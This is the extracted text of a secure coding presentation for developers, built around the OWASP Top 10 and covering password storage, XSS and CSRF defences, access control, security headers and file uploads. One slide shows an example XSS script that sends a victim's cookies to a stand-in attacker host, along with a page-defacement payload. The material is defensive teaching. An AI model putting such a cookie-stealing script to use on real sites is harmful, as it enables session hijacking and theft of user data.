Caution: This is a dated presentation; uploaded for reference. While the principles remain valid, specifics may have changed.
This presentation was made for software developers in Chandigarh - as a part of the NULL & OWASP Chandigarh Chapter activities.
It covers the basics of secure software development and secure coding using OWASP Top 10 as a broad guide.
12. Disable Browser Autocomplete
<form AUTOCOMPLETE="off">
<input AUTOCOMPLETE="off">
Only send passwords over HTTPS POST
Do not display passwords in browser
Input type=password
Store password based on need
Use a salt (de-duplication)
SCRYPT/PBKDF2 (slow, performance hit, easy)
HMAC (requires good key storage, tough)
[2][2]Password Defenses
13. 1) Do not limit the type of characters or
length*
of user password
•) Limiting passwords to protect against
injection is doomed to failure
•) Use proper encoder and other defenses
described instead
Password Storage
14. 2) Use a Cryptographically strong
credential-specific salt
•) Protect ([salt] + [password]);
•) Use a 32 char / 64 char salt
(may depend on protection function)
•) Do not depend on hiding / splitting /
otherwise obscuring the salt
Password Storage
15. 3) Impose difficult verification on attacker
ONLY
•) HMAC-SHA256 ([private key], [salt] + [password])
•) Protect the key as any private key
•) Store key outside the credential store (
•) Improvement over (solely) salted schemes; relies on
proper key creation & management
Password Storage
16. 4) Impose difficult verification on both
(impacts attacker more than defender)
•) pbkdf2([salt] + [password], c=10,000,000);
•) PBKDF2 when FIPS certification or
enterprise support on many platforms
required
•) Scrypt when resisting hardware accelerated
attacks is more important
Password Storage
17. Basic MFA Considerations
17
• Where do you send the token?
– Email (worst – yet, better than none!)
– SMS (ok)
– Mobile native app (good)
– Dedicated token (great)
– Printed Tokens (interesting)
• How do you handle thick clients?
– Email services, for example
– Dedicated and strong per-app passwords
18. Basic MFA Considerations
18
• How do you handle unavailable MFA devices?
– Printed back-up codes
– Fallback mechanism (like email)
– Call-in center
• How do you handle mobile apps?
– When is MFA not useful in mobile app scenarios?
19. “Forgot Password” design
Require identity questions
Last name, account number, email, DOB
Enforce lockout policy
Ask one or more good security questions
https://www.owasp.org/index.php/Choosing_and_Using_Security_Ques
tions_Cheat_Sheet
Send the user a randomly generated token via out-of-band
email, SMS or hardware / software token generator
Verify code in same web session
Enforce lockout policy
Change password
Enforce password policy
22. <script >
var badURL =
‘https://evileviljim.com/somesite/data=‘ +
document.cookie;
var img = new Image();
img.src = badURL;
</script>
<script>document.body.innerHTML=‘<blink>CYBER
IS COOL</blink>’;</script>
Anatomy of an XSS Attack
23. Impact of XSS
– Session Hijacking
– Site Defacement
– Network Scanning
– Undermining CSRF Defenses
– Site Redirection/Phishing
– Load of Remotely Hosted Scripts
– Data Theft
– Keystroke Logging
– Attackers using XSS more frequently
24. XSS Prevention (.NET)
• WebForms/WebForms View Engine <%=Server.HtmlEncode(data)%>
• WebForms v4.0+ <%data%>
• MVC3+ Razor View Engine @data
• Data Binding in Web Forms v4 and below
<%#Server.HtmlEncode(Eval(“property”))%>
• Data Binding in v4.5 <%#Item.Property%>
• Better: ASP.Net 3.5 and below use AntiXss library directly
Microsoft.Security.Application.Encoder.HtmlEncode(message)
25. XSS Prevention (.NET)
• ASP.Net 4 (WebForms and MVC) <httpRuntime encoderType=
“Microsoft.Security.Application.AntiXssEncoder,AntiXssLibr
ary”/>
• ASP.Net 4.5 (AntiXss included in this version!)
<httpRuntime
encoderType=”System.WebSecurity.AntiXssEncoder,
System.Web, Version=4.0.0.0, Culture=neutral,
PublicKeyToken=b03f5f7f11d50a3a”/>
• JSON(MVC) Json.Encode(Model)
• Javascript encoding using AntiXss
Encoder.JavaScriptEncode(Model.FirstName)
28. • No third party libraries or configuration necessary
• This code was designed for high-availability/high-
performance encoding functionality
• Simple drop-in encoding functionality
• Performance, ESAPI integration
• More complete API (uri and uri component encoding,
etc) in some regards
• Java 1.5+
• Last updated January 30, 2014 (version 1.1.1)
https://www.owasp.org/index.php/OWASP_Java_Encoder_Project
OWASP Java Encoder Project
29. Web Page built in Java JSP is vulnerable to XSSWeb Page built in Java JSP is vulnerable to XSS
OWASP Java Encoder Project
Problem
Solution
1) <input type="text" name="data" value="<%=
Encode.forHtmlAttribute(dataValue) %>" />
2) <textarea name="text"><%= Encode.forHtmlContent(textValue) %>" />
3) <button
onclick="alert('<%= Encode.forJavaScriptAttribute(alertMsg) %>');">
click me
</button>
4) <script type="text/javascript">
var msg = "<%= Encode.forJavaScriptBlock(message) %>";
alert(msg);
</script>
33. • Writte in Java; lets you include HTML authored by third-parties in
your web application while protecting against XSS
• Has an extensive test suite, and has undergone adversarial
security review
https://code.google.com/p/owasp-java-html-sanitizer/wiki/At
tackReviewGroundRules
• Very easy to use
• Allows for simple programmatic POSITIVE policy configuration.
No XML config.
• << Caja project (Google)
High performance & low memory utilization
OWASP HTML Sanitizer Project
https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project
34. Web Page is vulnerable to XSS because of untrusted HTMLWeb Page is vulnerable to XSS because of untrusted HTML
PolicyFactory policy = new HtmlPolicyBuilder()
.allowElements("a")
.allowUrlProtocols("https")
.allowAttributes("href").onElements("a")
.requireRelNofollowOnLinks()
.build();
String safeHTML = policy.sanitize(untrustedHTML);
PolicyFactory policy = new HtmlPolicyBuilder()
.allowElements("a")
.allowUrlProtocols("https")
.allowAttributes("href").onElements("a")
.requireRelNofollowOnLinks()
.build();
String safeHTML = policy.sanitize(untrustedHTML);
Solving real world problems
(using OWASP HTML Sanitizer)
Problem
Solution
35. • Pure JavaScript
– http://code.google.com/p/google-caja/wiki/JsHtmlSanitizer
• Python
– https://pypi.python.org/pypi/bleach
• PHP
– http://htmlpurifier.org/
– http://www.bioinformatics.org/phplabware/internal_utilities/htm
Lawed/
• .NET
– AntiXSS.getSafeHTML/getSafeHTMLFragment
– http://htmlagilitypack.codeplex.com/
• Ruby on Rails
– http://api.rubyonrails.org/classes/HTML.html
Other HTML Sanitizers
36. • JavaScript encode and delimit untrusted data as quoted
strings
• Avoid use of HTML rendering methods like innerHTML
– If you must do this, then sanitize untrusted HTML first
• Avoid code execution contexts
– eval(), setTimeout() or event handlers
• When possible, treat untrusted data as display text only
• To build dynamic interfaces, use
document.createElement("…"),
element.setAttribute("…","value"),
element.appendChild(…)
• Parse JSON with JSON.parse in the browser
DOM-based XSS Defense
37.
SAFE use of JQuery
$(‘#element’).text(UNTRUSTED DATA);
UNSAFE use of JQuery
$(‘#element’).html(UNTRUSTED DATA);
41. 41
We need to change the method signature (the ID is now a GUID), then translate it
back to the original, direct reference before going any further:
public Customer GetCustomer(Guid indirectId)
{ var customerId =
IndirectReferenceMap.GetDirectReference(indirectId); }
Insecure Direct Object Reference
43. [5][5]Security Misconfiguration
Is it really the developers' work? Or the sysadmins?
If the developers don't know, how will the application
security design be complete?
What about configuring in Dev & Testing environments?
44. • Harden the Operating System
– BIOS & grub passwords; secure physical access
– Use multiple partitions (not default install); use options like
ro, nosuid,noexec,nodev --make-runbindable ...
– Remove all unnecessary packages & drivers (e.g., do you
really need Xorg? All those fonts?)
– Lockdown others (cron, USB detect, IPv6, ctrl-alt-del,
– SSH password-less login with SSH keygen
– Enable ufw / iptables / … and a HIDS >> turn on remote
logging
– Oh yeah, regular patches & updates (wait!)
– Regular backups!
Hardening the servers (general)
51. • Steps :
– Go to
“C:WindowsMicrosoft.NETFrameworkv4.0.30319”
using command prompt.
aspnet_regiis.exe -pe "connectionStrings" “<path
of Web.Config>”
• Decrypting the web.config
– Go to the same path
aspnet_regiis.exe -pd "connectionStrings" “<path
of Web.Config>”
Encrypting web.config
57. 57
How many are already “logged in”?
Waiting to update your status, accept your credit card or email your friends
What if another tab manages to send a request?
What about others with the “remember me” checkbox?
No need for tab to be open... just send a request and they'll happily accept!
How many tabs on your browser?
62. 62
To add the anti-forgery tokens to a Razor page, use the HtmlHelper.AntiForgeryToken helper
method:
@using (Html.BeginForm("Manage", "Account"))
{ @Html.AntiForgeryToken() }
This method adds the hidden form field and also sets the cookie token.
<script>
@functions
{
public string TokenHeaderValue()
{
string cookieToken, formToken;
AntiForgery.GetTokens(null, out cookieToken, out formToken);
return cookieToken + ":" + formToken;
}
}
$.ajax("api/values", { type: "post", contentType: "application/json", data: { }, // JSON
data goes here dataType: "json", headers: { 'RequestVerificationToken':
'@TokenHeaderValue()' } }); </script>
Anti-Forgery Tokens
66. • Authorization: The process where a system determines
whether a specific user has access to a resource
• Permission: Represents app behavior only
• Entitlement: What a user is actually allowed to do
• Principle/User: Who/what you are entitling
• Implicit Role: Named permission, user associated
– if (user.isRole(“Manager”));
• Explicit Role: Named permission, resource associated
– if (user.isAuthorized(“report:view:3324”);
What is Access Control
67. • Hard-coded role checks in application code
• Lack of centralized access control logic
• Untrusted data driving access control decisions
• Access control that is “open by default”
• Lack of addressing horizontal access control in a
standardized way (if at all)
• Access control logic that needs to be manually added to
every endpoint in code
• Access Control that is “sticky” per session
• Access Control that requires per-user policy
Access Control DON'Ts
68. • Vertical Access Control Attacks
– A standard user accessing administration
functionality
• Horizontal Access Control Attacks
– Same role, but accessing another user's private
data
• Business Logic Access Control Attacks
– Abuse of one or more linked activities that
collectively realize a business objective
Attacks on Access Control
69. • Loss of accountability
– Attackers maliciously execute actions as other
users
– Attackers maliciously execute higher level
actions
• Disclosure of confidential data
– Compromising admin-level accounts often
results in access to user’s confidential data
• Data tampering
– Privilege levels do not distinguish users who can
only view data and users permitted to modify
data
Impact of poor Access Control
70. • Apache Shiro is a powerful and easy to use Java security
framework
• Offers developers an intuitive yet comprehensive
solution to authentication, authorization, cryptography,
and session management
• Built on sound interface-driven design and OO principles
• Enables custom behavior
• Sensible and secure defaults for everything
Apache SHIRO
http://shiro.apache.org/
71. Web Application needs secure access control mechanismWeb Application needs secure access control mechanism
if ( currentUser.isPermitted( "lightsaber:wield" ) ) {
log.info("You may use a lightsaber ring. Use it wisely.");
} else {
log.info("Sorry, lightsaber rings are for schwartz masters
only.");
}
if ( currentUser.isPermitted( "lightsaber:wield" ) ) {
log.info("You may use a lightsaber ring. Use it wisely.");
} else {
log.info("Sorry, lightsaber rings are for schwartz masters
only.");
}
Problem
Solution
Solving real world
Access Control problems
72. int winnebagoId = request.getInt("winnebago_id");
if ( currentUser.isPermitted( "winnebago:drive:" + winnebagoId) )
{
log.info("You are permitted to 'drive' the 'winnebago’. Here
are the keys.");
} else {
log.info("Sorry, you aren't allowed to drive this
winnebago!");
}
int winnebagoId = request.getInt("winnebago_id");
if ( currentUser.isPermitted( "winnebago:drive:" + winnebagoId) )
{
log.info("You are permitted to 'drive' the 'winnebago’. Here
are the keys.");
} else {
log.info("Sorry, you aren't allowed to drive this
winnebago!");
}
Solving real world
Access Control problems
Web Application needs secure access to a specific objectWeb Application needs secure access to a specific object
Problem
Solution
73. “GET” exposes sensitive authentication information in the URL
In Web Server and Proxy Server logs
In the http referer header
In Bookmarks/Favorites often emailed to others
“POST” places information in the body of the request and not the URL
Enforce HTTPS POST For Sensitive Data Transport
73
HTTP: POST vs GET
[E1]
77. Fixes mime sniffing attacks
Only applies to IE
X-Content-Type-Options = ‘nosniff’
X-ContentType-Options
78. • Anti-XSS W3C standard http://www.w3.org/TR/CSP/
• Move all inline script and style into external files
• Add the X-Content-Security-Policy response header to
instruct the browser that CSP is in use
• Define a policy for the site regarding loading of content
• Chrome version 25 and later (50%)
• Firefox version 23 and later (30%)
• Internet Explorer version 10 and later (10%)
Content Security Policy
79. Add the following as part of your HTTP Response
Cache-Control: no-store, no-cache, must-revalidate
Expires: -1
Disabling the browser cache
80. [E2][E2]Application Layer
Intrusion Detection
• Great detection points to start with
– Input validation failure server side when client side
validation exists
– Input validation failure server side on non-user editable
parameters
(hidden fields, checkboxes, radio buttons or select lists)
– Forced browsing to common attack entry points
e.g., /admin/secretlogin.jsp or honeypot URL (a fake path
listed in /robots.txt)
81. Application Layer
Intrusion Detection
• Others
– Blatant SQLi or XSS injection attacks
– Workflow sequence abuse (e.g. multi-part
form in wrong order)
– Custom business logic (e.g. basket vs
catalogue price mismatch)
82. OWASP AppSensor (Java)
• Project and mailing list
https://www.owasp.org/index.php/OWASP_
AppSensor_Project
• Four-page briefing, Crosstalk, Journal of
Defense Software Engineering
• http://www.crosstalkonline.org/storage/iss
ue-archives/2011/201109/201109-
Watson.pdf
83. [E3][E3]Encryption in transit
• Confidentiality, Integrity (in Transit) and Authenticity
– Authentication credentials and session identifiers must be encrypted in
transit via HTTPS/SSL
– Starting when the login form is rendered until logout is complete
• HTTPS configuration best practices
– https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sh
eet
• HSTS (Strict Transport Security)
– http://www.youtube.com/watch?v=zEV3HOuM_Vw
– Strict-Transport-Security: max-age=31536000
• Certificate Pinning
– https://www.owasp.org/index.php/Pinning_Cheat_Sheet
84. Strict-transport-security: max-age=10000000
Do all of your subdomains support SSL?
Strict-transport-security: max-age=10000000; includeSubdomains
Strict Transport Security (HSTS)
protected void Application_BeginRequest(Object sender, EventArgs e)
{
switch (Request.Url.Scheme)
{
case "https":
Response.AddHeader("Strict-Transport-Security", "max-
age=31536000");
break;
case "http":
var path = "https://" + Request.Url.Host +
Request.Url.PathAndQuery;
Response.Status = "301 Moved Permanently";
Response.AddHeader("Location", path);
break;
}
} // in global.asax
85. • What is Pinning
– Pinning is a key continuity scheme
– Detect when an imposter with a fake but CA validated
certificate attempts to act like the real server
• 2 Types of pinning
• Carry around a copy of the server’s public key;
– Great if you are distributing a dedicated client-server
application since you know the server’s certificate or public
key in advance
• Note of the server’s public key on first use (Trust-on-First-Use,
Tofu)
– Useful when no a priori knowledge exists, such as SSH or a
Browser
• https://www.owasp.org/index.php/Pinning_Cheat_Sheet
Certificate Pinning
86. File Upload Security
• Upload Verification
– Filename and Size validation + antivirus
• Upload Storage
– Use only trusted filenames + separate domain
• Beware of "special" files
– "crossdomain.xml" or "clientaccesspolicy.xml".
• Image Upload Verification
– Enforce proper image size limits
– Use image rewriting libraries
– Set the extension of the stored image to be a valid image extension
– Ensure the detected content type of the image is safe
• Generic Upload Verification
– Ensure decompressed size of file < maximum size
– Ensure that an uploaded archive matches the type expected (zip, rar)
– Ensure structured uploads such as an add-on follow proper standard
[E4][E4]